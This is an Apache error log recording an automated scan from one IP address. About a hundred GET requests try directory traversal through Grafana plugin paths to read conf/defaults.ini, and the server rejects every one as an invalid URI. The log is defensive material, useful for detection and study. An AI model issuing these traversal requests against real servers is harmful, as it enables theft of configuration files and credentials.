[Wed Jun 21 06:33:46.859278 2023] [core:error] [pid 13072:tid 19120] [client 177.55.244.174:1704] AH00126: Invalid URI in request GET /public/plugins/barchart/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.859278 2023] [core:error] [pid 13072:tid 18232] [client 177.55.244.174:1853] AH00126: Invalid URI in request GET /public/plugins/aws-datasource-provisioner-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.859278 2023] [core:error] [pid 13072:tid 18044] [client 177.55.244.174:1649] AH00126: Invalid URI in request GET /public/plugins/aquaqanalytics-kdbadaptor-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 20388] [client 177.55.244.174:1962] AH00126: Invalid URI in request GET /public/plugins/anodot-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 18332] [client 177.55.244.174:1859] AH00126: Invalid URI in request GET /public/plugins/belugacdn-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 19048] [client 177.55.244.174:1702] AH00126: Invalid URI in request GET /public/plugins/anodot-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 19424] [client 177.55.244.174:1857] AH00126: Invalid URI in request GET /public/plugins/ayoungprogrammer-finance-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 19564] [client 177.55.244.174:1709] AH00126: Invalid URI in request GET /public/plugins/briangann-gauge-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 18336] [client 177.55.244.174:1571] AH00126: Invalid URI in request GET /public/plugins/bessler-pictureit-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 19016] [client 177.55.244.174:1703] AH00126: Invalid URI in request GET /public/plugins/auxmoney-waterfall-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 20260] [client 177.55.244.174:1662] AH00126: Invalid URI in request GET /public/plugins/camptocamp-prometheus-alertmanager-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 19368] [client 177.55.244.174:2002] AH00126: Invalid URI in request GET /public/plugins/canvas/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 19156] [client 177.55.244.174:1710] AH00126: Invalid URI in request GET /public/plugins/ccin2p3-riemann-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 20072] [client 177.55.244.174:1705] AH00126: Invalid URI in request GET /public/plugins/bargauge/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 18892] [client 177.55.244.174:1625] AH00126: Invalid URI in request GET /public/plugins/chaosmeshorg-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 18392] [client 177.55.244.174:1660] AH00126: Invalid URI in request GET /public/plugins/boazreicher-mosaicplot-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 18776] [client 177.55.244.174:1707] AH00126: Invalid URI in request GET /public/plugins/bosun-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 19404] [client 177.55.244.174:1977] AH00126: Invalid URI in request GET /public/plugins/cloudspout-button-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 18004] [client 177.55.244.174:1711] AH00126: Invalid URI in request GET /public/plugins/clarity89-finnhub-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 18568] [client 177.55.244.174:2004] AH00126: Invalid URI in request GET /public/plugins/cloudwatch/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 19936] [client 177.55.244.174:2007] AH00126: Invalid URI in request GET /public/plugins/corpglory-progresslist-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 19296] [client 177.55.244.174:1695] AH00126: Invalid URI in request GET /public/plugins/cognitedata-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 18712] [client 177.55.244.174:1712] AH00126: Invalid URI in request GET /public/plugins/computest-cloudwatchalarm-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.874878 2023] [core:error] [pid 13072:tid 18540] [client 177.55.244.174:1978] AH00126: Invalid URI in request GET /public/plugins/corpglory-chartwerk-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.093279 2023] [core:error] [pid 13072:tid 19296] [client 177.55.244.174:1926] AH00126: Invalid URI in request GET /public/plugins/dalvany-image-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.108879 2023] [core:error] [pid 13072:tid 18568] [client 177.55.244.174:1882] AH00126: Invalid URI in request GET /public/plugins/ddurieux-glpi-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.124479 2023] [core:error] [pid 13072:tid 20072] [client 177.55.244.174:1581] AH00126: Invalid URI in request GET /public/plugins/debug/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.124479 2023] [core:error] [pid 13072:tid 18712] [client 177.55.244.174:1984] AH00126: Invalid URI in request GET /public/plugins/digiapulssi-breadcrumb-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.140079 2023] [core:error] [pid 13072:tid 18540] [client 177.55.244.174:1583] AH00126: Invalid URI in request GET /public/plugins/embraceio-metric-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.140079 2023] [core:error] [pid 13072:tid 19404] [client 177.55.244.174:1602] AH00126: Invalid URI in request GET /public/plugins/elasticsearch/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.140079 2023] [core:error] [pid 13072:tid 19936] [client 177.55.244.174:1989] AH00126: Invalid URI in request GET /public/plugins/esnet-chord-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.155679 2023] [core:error] [pid 13072:tid 18392] [client 177.55.244.174:1754] AH00126: Invalid URI in request GET /public/plugins/factry-untimely-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.171279 2023] [core:error] [pid 13072:tid 19016] [client 177.55.244.174:1836] AH00126: Invalid URI in request GET /public/plugins/foursquare-clouderamanager-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.186879 2023] [core:error] [pid 13072:tid 19564] [client 177.55.244.174:1979] AH00126: Invalid URI in request GET /public/plugins/gettingstarted/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.186879 2023] [core:error] [pid 13072:tid 19424] [client 177.55.244.174:1975] AH00126: Invalid URI in request GET /public/plugins/gowee-traceroutemap-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.186879 2023] [core:error] [pid 13072:tid 20260] [client 177.55.244.174:1939] AH00126: Invalid URI in request GET /public/plugins/goshposh-metaqueries-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.249279 2023] [core:error] [pid 13072:tid 19296] [client 177.55.244.174:1580] AH00126: Invalid URI in request GET /public/plugins/digrich-bubblechart-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.374079 2023] [core:error] [pid 13072:tid 20260] [client 177.55.244.174:1881] AH00126: Invalid URI in request GET /public/plugins/grafana-astradb-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.389679 2023] [core:error] [pid 13072:tid 19564] [client 177.55.244.174:1885] AH00126: Invalid URI in request GET /public/plugins/grafana-athena-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.389679 2023] [core:error] [pid 13072:tid 19424] [client 177.55.244.174:1886] AH00126: Invalid URI in request GET /public/plugins/grafana-azure-data-explorer-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.389679 2023] [core:error] [pid 13072:tid 19016] [client 177.55.244.174:1887] AH00126: Invalid URI in request GET /public/plugins/grafana-azure-monitor-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.420879 2023] [core:error] [pid 13072:tid 18392] [client 177.55.244.174:1591] AH00126: Invalid URI in request GET /public/plugins/grafana-clock-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.420879 2023] [core:error] [pid 13072:tid 19936] [client 177.55.244.174:1584] AH00126: Invalid URI in request GET /public/plugins/grafana-clickhouse-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.420879 2023] [core:error] [pid 13072:tid 18540] [client 177.55.244.174:1582] AH00126: Invalid URI in request GET /public/plugins/grafana-azuredevops-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.420879 2023] [core:error] [pid 13072:tid 19404] [client 177.55.244.174:1824] AH00126: Invalid URI in request GET /public/plugins/grafana-bigquery-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.436479 2023] [core:error] [pid 13072:tid 18712] [client 177.55.244.174:1744] AH00126: Invalid URI in request GET /public/plugins/grafana-databricks-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.514479 2023] [core:error] [pid 13072:tid 20260] [client 177.55.244.174:1981] AH00126: Invalid URI in request GET /public/plugins/grafana-dynatrace-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.530079 2023] [core:error] [pid 13072:tid 19296] [client 177.55.244.174:1750] AH00126: Invalid URI in request GET /public/plugins/grafana-discourse-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.670480 2023] [core:error] [pid 13072:tid 18712] [client 177.55.244.174:1669] AH00126: Invalid URI in request GET /public/plugins/grafana-enterprise-traces-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.670480 2023] [core:error] [pid 13072:tid 20260] [client 177.55.244.174:1983] AH00126: Invalid URI in request GET /public/plugins/grafana-github-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.670480 2023] [core:error] [pid 13072:tid 19936] [client 177.55.244.174:1982] AH00126: Invalid URI in request GET /public/plugins/grafana-es-open-distro-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.701680 2023] [core:error] [pid 13072:tid 19296] [client 177.55.244.174:1847] AH00126: Invalid URI in request GET /public/plugins/grafana-googlesheets-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.701680 2023] [core:error] [pid 13072:tid 18540] [client 177.55.244.174:1822] AH00126: Invalid URI in request GET /public/plugins/grafana-guidedtour-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.717280 2023] [core:error] [pid 13072:tid 19404] [client 177.55.244.174:1893] AH00126: Invalid URI in request GET /public/plugins/grafana-image-renderer/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.764080 2023] [core:error] [pid 13072:tid 18392] [client 177.55.244.174:1809] AH00126: Invalid URI in request GET /public/plugins/grafana-gitlab-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.795280 2023] [core:error] [pid 13072:tid 19016] [client 177.55.244.174:1894] AH00126: Invalid URI in request GET /public/plugins/grafana-iot-sitewise-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.795280 2023] [core:error] [pid 13072:tid 19424] [client 177.55.244.174:1756] AH00126: Invalid URI in request GET /public/plugins/grafana-iot-twinmaker-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.857680 2023] [core:error] [pid 13072:tid 19404] [client 177.55.244.174:1917] AH00126: Invalid URI in request GET /public/plugins/citilogics-geoloop-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.857680 2023] [core:error] [pid 13072:tid 19936] [client 177.55.244.174:1918] AH00126: Invalid URI in request GET /public/plugins/aidanmountford-html-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.857680 2023] [core:error] [pid 13072:tid 18540] [client 177.55.244.174:1839] AH00126: Invalid URI in request GET /public/plugins/boazreicher-sierraplot-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.857680 2023] [core:error] [pid 13072:tid 19296] [client 177.55.244.174:1916] AH00126: Invalid URI in request GET /public/plugins/cloudflare-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.935680 2023] [core:error] [pid 13072:tid 20260] [client 177.55.244.174:1940] AH00126: Invalid URI in request GET /public/plugins/grafana-jira-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.935680 2023] [core:error] [pid 13072:tid 19424] [client 177.55.244.174:1648] AH00126: Invalid URI in request GET /public/plugins/grafana-k6-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.951280 2023] [core:error] [pid 13072:tid 18392] [client 177.55.244.174:1757] AH00126: Invalid URI in request GET /public/plugins/grafana-k6cloud-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.982480 2023] [core:error] [pid 13072:tid 19016] [client 177.55.244.174:1626] AH00126: Invalid URI in request GET /public/plugins/grafana-kairosdb-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:47.982480 2023] [core:error] [pid 13072:tid 18712] [client 177.55.244.174:1784] AH00126: Invalid URI in request GET /public/plugins/grafana-metrics-enterprise-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.076080 2023] [core:error] [pid 13072:tid 19936] [client 177.55.244.174:1915] AH00126: Invalid URI in request GET /public/plugins/grafana-mongodb-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.076080 2023] [core:error] [pid 13072:tid 19424] [client 177.55.244.174:1892] AH00126: Invalid URI in request GET /public/plugins/grafana-mqtt-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.091680 2023] [core:error] [pid 13072:tid 18540] [client 177.55.244.174:1820] AH00126: Invalid URI in request GET /public/plugins/grafana-newrelic-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.122881 2023] [core:error] [pid 13072:tid 19016] [client 177.55.244.174:1936] AH00126: Invalid URI in request GET /public/plugins/grafana-odbc-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.138481 2023] [core:error] [pid 13072:tid 18712] [client 177.55.244.174:1937] AH00126: Invalid URI in request GET /public/plugins/grafana-oncall-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.138481 2023] [core:error] [pid 13072:tid 18392] [client 177.55.244.174:1938] AH00126: Invalid URI in request GET /public/plugins/grafana-opensearch-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.138481 2023] [core:error] [pid 13072:tid 20260] [client 177.55.244.174:1549] AH00126: Invalid URI in request GET /public/plugins/devopsprodigy-kubegraf-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.200881 2023] [core:error] [pid 13072:tid 19296] [client 177.55.244.174:1585] AH00126: Invalid URI in request GET /public/plugins/grafana-oracle-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.216481 2023] [core:error] [pid 13072:tid 19404] [client 177.55.244.174:1586] AH00126: Invalid URI in request GET /public/plugins/grafana-piechart-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.247681 2023] [core:error] [pid 13072:tid 18540] [client 177.55.244.174:1655] AH00126: Invalid URI in request GET /public/plugins/grafana-redshift-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.247681 2023] [core:error] [pid 13072:tid 19424] [client 177.55.244.174:1551] AH00126: Invalid URI in request GET /public/plugins/grafana-polystat-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.356881 2023] [core:error] [pid 13072:tid 19296] [client 177.55.244.174:1576] AH00126: Invalid URI in request GET /public/plugins/grafana-salesforce-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.356881 2023] [core:error] [pid 13072:tid 19404] [client 177.55.244.174:1858] AH00126: Invalid URI in request GET /public/plugins/grafana-sentry-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.356881 2023] [core:error] [pid 13072:tid 20260] [client 177.55.244.174:1901] AH00126: Invalid URI in request GET /public/plugins/grafana-saphana-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.403681 2023] [core:error] [pid 13072:tid 19424] [client 177.55.244.174:1782] AH00126: Invalid URI in request GET /public/plugins/grafana-servicenow-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.403681 2023] [core:error] [pid 13072:tid 18392] [client 177.55.244.174:1731] AH00126: Invalid URI in request GET /public/plugins/grafana-singlestat-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.419281 2023] [core:error] [pid 13072:tid 18540] [client 177.55.244.174:1632] AH00126: Invalid URI in request GET /public/plugins/grafana-simple-json-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.419281 2023] [core:error] [pid 13072:tid 18712] [client 177.55.244.174:1543] AH00126: Invalid URI in request GET /public/plugins/grafana-snowflake-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.466081 2023] [core:error] [pid 13072:tid 18244] [client 177.55.244.174:1670] AH00126: Invalid URI in request GET /public/plugins/grafana-splunk-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.481681 2023] [core:error] [pid 13072:tid 19016] [client 177.55.244.174:1947] AH00126: Invalid URI in request GET /public/plugins/grafana-splunk-monitoring-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.544081 2023] [core:error] [pid 13072:tid 20260] [client 177.55.244.174:1986] AH00126: Invalid URI in request GET /public/plugins/grafana-synthetic-monitoring-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.544081 2023] [core:error] [pid 13072:tid 19404] [client 177.55.244.174:1985] AH00126: Invalid URI in request GET /public/plugins/grafana-strava-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.622081 2023] [core:error] [pid 13072:tid 19016] [client 177.55.244.174:1587] AH00126: Invalid URI in request GET /public/plugins/grafana-worldmap-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.668881 2023] [core:error] [pid 13072:tid 20912] [client 177.55.244.174:1796] AH00126: Invalid URI in request GET /public/plugins/grafana-enterprise-logs-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.668881 2023] [core:error] [pid 13072:tid 20260] [client 177.55.244.174:1673] AH00126: Invalid URI in request GET /public/plugins/grafana-x-ray-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.684481 2023] [core:error] [pid 13072:tid 19404] [client 177.55.244.174:1795] AH00126: Invalid URI in request GET /public/plugins/graph/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.684481 2023] [core:error] [pid 13072:tid 18244] [client 177.55.244.174:1797] AH00126: Invalid URI in request GET /public/plugins/gretamosa-topology-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.746882 2023] [core:error] [pid 13072:tid 18712] [client 177.55.244.174:2003] AH00126: Invalid URI in request GET /public/plugins/gridprotectionalliance-openhistorian-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.746882 2023] [core:error] [pid 13072:tid 18392] [client 177.55.244.174:2008] AH00126: Invalid URI in request GET /public/plugins/gridprotectionalliance-osisoftpi-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.762482 2023] [core:error] [pid 13072:tid 18540] [client 177.55.244.174:1680] AH00126: Invalid URI in request GET /public/plugins/grafana-timestream-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.809282 2023] [core:error] [pid 13072:tid 20912] [client 177.55.244.174:1674] AH00126: Invalid URI in request GET /public/plugins/hadesarchitect-cassandra-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.809282 2023] [core:error] [pid 13072:tid 19016] [client 177.55.244.174:1957] AH00126: Invalid URI in request GET /public/plugins/groonga-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:48.934082 2023] [core:error] [pid 13072:tid 18540] [client 177.55.244.174:1577] AH00126: Invalid URI in request GET /public/plugins/hamedkarbasi93-nodegraphapi-datasource/../../../../../conf/defaults.ini HTTP/1.1
